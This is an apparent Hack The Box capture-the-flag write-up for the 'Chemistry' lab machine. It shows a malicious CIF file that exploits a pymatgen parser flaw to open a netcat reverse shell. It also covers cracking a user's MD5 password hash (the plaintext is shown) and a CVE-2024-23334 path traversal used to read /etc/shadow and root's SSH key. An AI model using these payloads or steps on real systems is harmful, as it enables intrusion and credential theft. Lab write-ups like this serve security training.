[HTB] Chemistry

First Post:

Last Update:
OS:Linux Linux
Difficulty: Easy
Author: FisMatHack
Release Date: October 19, 2024

Video Walkthrough

Recon

Nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
nmap -T4 -A -p- 10.10.11.38 -o initial_scan.nmap
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-04 15:18 WET
Nmap scan report for 10.10.11.38
Host is up (0.072s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 b6:fc:20:ae:9d:1d:45:1d:0b:ce:d9:d0:20:f2:6f:dc (RSA)
|   256 f1:ae:1c:3e:1d:ea:55:44:6c:2f:f2:56:8d:62:3c:2b (ECDSA)
|_  256 94:42:1b:78:f2:51:87:07:3e:97:26:c9:a2:5c:0a:26 (ED25519)
5000/tcp open  http    Werkzeug httpd 3.0.3 (Python 3.9.5)
|_http-title: Chemistry - Home
|_http-server-header: Werkzeug/3.0.3 Python/3.9.5
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5.0
OS details: Linux 5.0, Linux 5.0 - 5.14
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 443/tcp)
HOP RTT      ADDRESS
1   71.91 ms 10.10.14.1
2   72.01 ms 10.10.11.38

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.28 seconds
Port Service
22 SSH
5000 HTTP

HTTP Page

By visiting the http page on port 5000 we can find a CIF Analyzer

After registering, we are able to upload a CIF file

User

CIF Reverse Shell

If we google for vulnerabilities involving CIF files, we come accross this GitHub Page explaining a code execution vulnerability when parsing CIF file

We can change the command in the payload, to start a reverse shell

Create a .cif file with the following payload

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
data_5yOhtAoR
_audit_creation_date            2018-06-08
_audit_creation_method          "Pymatgen CIF Parser Arbitrary Code Execution Exploit"

loop_
_parent_propagation_vector.id
_parent_propagation_vector.kxkykz
k1 [0 0 0]

_space_group_magn.transform_BNS_Pp_abc  'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("busybox nc 10.10.14.25 1337 -e /bin/bash");0,0,0'


_space_group_magn.number_BNS  62.448
_space_group_magn.name_BNS  "P  n'  m  a'  "

Start a listener

1
nc -lvnp 1337

When we click to view the uploaded file, we pop the shell

/etc/passwd

Rosa Password

Looking through the web app files, we come across database.db in /home/app/instance
We can start a python http server and transfer it to our machine

1
2
python3 -m http.server 1234
wget http://<attackerip:1234>/database.db

We can use sqlite3 to look through the database

1
2
3
sqlite3 database.db
.tables
select * from user;

From all the hashes, we can find the hash for the rosa user, which we know is a user in the machine
These are md5 hashes, we can just look for it in crackstation, or manually crack it using hashcat

1
2
echo '63ed86ee9f624c7b14f1d4f43dc251a5' > rosa.hash
hashcat -m 0 rosa.hash /usr/share/wordlists/rockyou.txt

rosa:unicorniosrosados

We can just ssh into the machine as rosa now
ssh rosa@10.10.11.38

Root

Site Monitoring Page

If we look at the machine’s used ports, we can see the port 8080 being used.

1
netstat -tlnp

Port forward port 8080 to your machine and open the page on a browser

1
ssh -L 1234:localhost:8080 rosa@10.10.11.38

We can use gobuster to look for directories

1
gobuster dir -u http://localhost:1234 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt

We do not have access to the /assets directory, but we will use this directory later as an anchor point for an exploit

CVE-2024-23334

To get more info on the web page, we can use WhatWeb

1
whatweb http://localhost:1234

By googling for aiohttp 3.9.1 vulnerabilities we can find this CVE-2024-23334 PoC for a path traversal vulnerability

Edit the exploit.sh file to try and read the /etc/shadow file
We will use the /assets directory as an anchor point for the path traversal

Transfer the exploit to the target machine and run it

1
2
3
wget http://<attackerip:port/exploit.sh>
chmod +x exploit.sh
./exploit.sh

We can use this to just read the root.txt and call it a day, but we can also use it to get the root user private ssh key
Change the file to root/.ssh/id_rsa in exploit.sh

Now if we run the exploit, we get the root user ssh key

Save the key to a file, change the permissions and login as root through ssh

1
2
chmod 600 id_rsa
ssh root@10.10.11.38 -i id_rsa

Rooted :)